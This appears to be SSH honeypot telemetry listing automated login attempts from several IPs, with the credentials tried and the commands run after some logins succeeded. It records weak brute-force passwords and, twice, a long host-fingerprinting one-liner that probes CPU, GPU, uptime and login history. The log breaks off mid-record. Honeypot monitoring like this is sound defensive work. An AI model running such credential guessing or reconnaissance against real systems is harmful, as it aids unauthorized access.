Adversarial Observation Interface

187.191.48.23

2026-06-30 07:45:06.898427 UTC

SUCCESSFUL LOGIN RECONNAISSANCE COMMANDS RUN SCORE: 100

Credential acceptance event recorded. Target authentication: ubuntu / qwest@20234

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ uname -a

Record ID: 94830eb716fc

Client Version: SSH-2.0-Go

Engagement Duration: 0.5s

HASSH Fingerprint: 16443846184eafde36765c9bab2f4397

{
  "id": "94830eb716fc",
  "src_ip": "187.191.48.23",
  "start_time": "2026-06-30T07:45:06.898427Z",
  "end_time": "2026-06-30T07:45:07.396821Z",
  "duration": "0.5",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "ubuntu",
    "pass": "qwest@20234"
  },
  "commands": [
    "uname -a"
  ],
  "detailed_commands": [
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 100,
  "tags": [
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE",
    "COMMANDS RUN"
  ]
}

187.191.48.23

2026-06-30 07:45:06.336755 UTC

SUCCESSFUL LOGIN RECONNAISSANCE COMMANDS RUN SCORE: 100

Credential acceptance event recorded. Target authentication: root / qwest@20234

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ uname -a

Record ID: a1bc2dbb0973

Client Version: SSH-2.0-Go

Engagement Duration: 0.5s

HASSH Fingerprint: 16443846184eafde36765c9bab2f4397

{
  "id": "a1bc2dbb0973",
  "src_ip": "187.191.48.23",
  "start_time": "2026-06-30T07:45:06.336755Z",
  "end_time": "2026-06-30T07:45:06.843221Z",
  "duration": "0.5",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "qwest@20234"
  },
  "commands": [
    "uname -a"
  ],
  "detailed_commands": [
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 100,
  "tags": [
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE",
    "COMMANDS RUN"
  ]
}

37.60.225.239

2026-06-30 07:42:30.754139 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: server37

Record ID: b9a58e87829c

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 1.9s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "b9a58e87829c",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:42:30.754139Z",
  "end_time": "2026-06-30T07:42:32.703692Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "server37",
      "pass": "server37"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:39:57.708035 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: server8

Record ID: ff319aaeed68

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "ff319aaeed68",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:39:57.708035Z",
  "end_time": "2026-06-30T07:39:59.698205Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "server8",
      "pass": "server8"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

45.148.10.239

2026-06-30 07:39:02.234150 UTC

SUCCESSFUL LOGIN COMMANDS RUN SCORE: 80

Credential acceptance event recorded. Target authentication: root / q1w2e3r4T5

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo OK

Record ID: 9da8cfafa09d

Client Version: SSH-2.0-Go

Engagement Duration: 1.1s

HASSH Fingerprint: 16443846184eafde36765c9bab2f4397

{
  "id": "9da8cfafa09d",
  "src_ip": "45.148.10.239",
  "start_time": "2026-06-30T07:39:02.234150Z",
  "end_time": "2026-06-30T07:39:03.310549Z",
  "duration": "1.1",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "q1w2e3r4T5"
  },
  "commands": [
    "echo OK"
  ],
  "detailed_commands": [
    {
      "cmd": "echo OK",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "SUCCESSFUL LOGIN",
    "COMMANDS RUN"
  ]
}

2.57.122.150

2026-06-30 07:38:09.334914 UTC

SUCCESSFUL LOGIN RECONNAISSANCE COMMANDS RUN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 123456789

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"

[obs-node]:~$ uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null

Command not found: /usr/bin/uname -s -v -n -m

[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ ( [ -f /proc/version ]

[obs-node]:~$ [ -f /proc/version ]

[obs-node]:~$ head -1 /proc/version | cut -d -f1

[obs-node]:~$ [ -f /etc/os-release ]

Record ID: 5b421d514e54

Client Version: SSH-2.0-Go

Engagement Duration: 1.3s

HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5

{
  "id": "5b421d514e54",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T07:38:09.334914Z",
  "end_time": "2026-06-30T07:38:10.592085Z",
  "duration": "1.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123456789"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE",
    "COMMANDS RUN"
  ]
}

37.60.225.239

2026-06-30 07:37:27.056261 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: iie

Record ID: 8a023ffc3cfc

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 1.9s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "8a023ffc3cfc",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:37:27.056261Z",
  "end_time": "2026-06-30T07:37:28.963975Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "iie",
      "pass": "iie123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:34:48.342723 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: xl

Record ID: ba1aa18d28e4

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "ba1aa18d28e4",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:34:48.342723Z",
  "end_time": "2026-06-30T07:34:50.360805Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "xl",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:34:05.327279 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: exam

Record ID: bce141a9b504

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "bce141a9b504",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:34:05.327279Z",
  "end_time": "2026-06-30T07:34:07.284699Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "exam",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:32:18.323288 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: old

Record ID: efa282b1a2d2

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "efa282b1a2d2",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:32:18.323288Z",
  "end_time": "2026-06-30T07:32:20.289366Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "old",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:32:12.835935 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: lb2

Record ID: 68d666389f3b

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "68d666389f3b",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:32:12.835935Z",
  "end_time": "2026-06-30T07:32:14.829023Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "lb2",
      "pass": "lb2"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:30:28.357696 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: philosophy

Record ID: 12cdb3e7de13

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "12cdb3e7de13",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:30:28.357696Z",
  "end_time": "2026-06-30T07:30:30.381268Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "philosophy",
      "pass": "philosophy"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:29:34.631227 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: tutorial

Record ID: 2091fed1fafd

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "2091fed1fafd",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:29:34.631227Z",
  "end_time": "2026-06-30T07:29:36.586181Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "tutorial",
      "pass": "tutorial123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:28:36.364176 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: pcm

Record ID: fe82f3f6367a

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "fe82f3f6367a",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:28:36.364176Z",
  "end_time": "2026-06-30T07:28:38.346547Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "pcm",
      "pass": "pcm123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:27:01.865219 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: gimli

Record ID: 51469930c4e6

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "51469930c4e6",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:27:01.865219Z",
  "end_time": "2026-06-30T07:27:03.857816Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "gimli",
      "pass": "gimli"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:26:52.580574 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: medicine

Record ID: f494b1b08c79

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "f494b1b08c79",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:26:52.580574Z",
  "end_time": "2026-06-30T07:26:54.610949Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "medicine",
      "pass": "medicine123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:25:09.488173 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: dirac

Record ID: 2a964e94a35b

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 1.9s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "2a964e94a35b",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:25:09.488173Z",
  "end_time": "2026-06-30T07:25:11.432222Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "dirac",
      "pass": "dirac123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

37.60.225.239

2026-06-30 07:24:26.062084 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: mazda

Record ID: 837edb4ca3e8

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "837edb4ca3e8",
  "src_ip": "37.60.225.239",
  "start_time": "2026-06-30T07:24:26.062084Z",
  "end_time": "2026-06-30T07:24:28.098456Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "mazda",
      "pass": "mazda"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

220.127.148.6

2026-06-30 07:23:22.273686 UTC

FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: bri

Record ID: 09a87e5ee8d0

Client Version: SSH-2.0-libssh_0.9.6

Engagement Duration: 2.0s

HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a

{
  "id": "09a87e5ee8d0",
  "src_ip": "220.127.148.6",
  "start_time": "2026-06-30T07:23:22.273686Z",
  "end_time": "2026-06-30T07:23:24.303504Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "bri",
      "pass": "bri"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}

2.57.122.150

2026-06-30 07:22:43.432224 UTC

SUCCESSFUL LOGIN RECONNAISSANCE COMMANDS RUN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 12345678

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"

[obs-node]:~$ uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null

Command not found: /usr/bin/uname -s -v -n -m

[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null

[obs-node]:~$ ( [ -f /proc/version ]

[obs-node]:~$ [ -f /proc/version ]

[obs-node]:~$ head -1 /proc/version | cut -d -f1

[obs-node]:~$ [ -f /etc/os-release ]

Record ID: 087bca3bc3e3

Client Version: SSH-2.0-Go

Engagement Duration: 1.3s

HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5

{
  "id": "087bca3bc3e3",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T07:22:43.432224Z",
  "end_time": "2026-06-30T07:22:44.705705Z",
  "duration": "1.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "12345678"
  },
  "commands": [
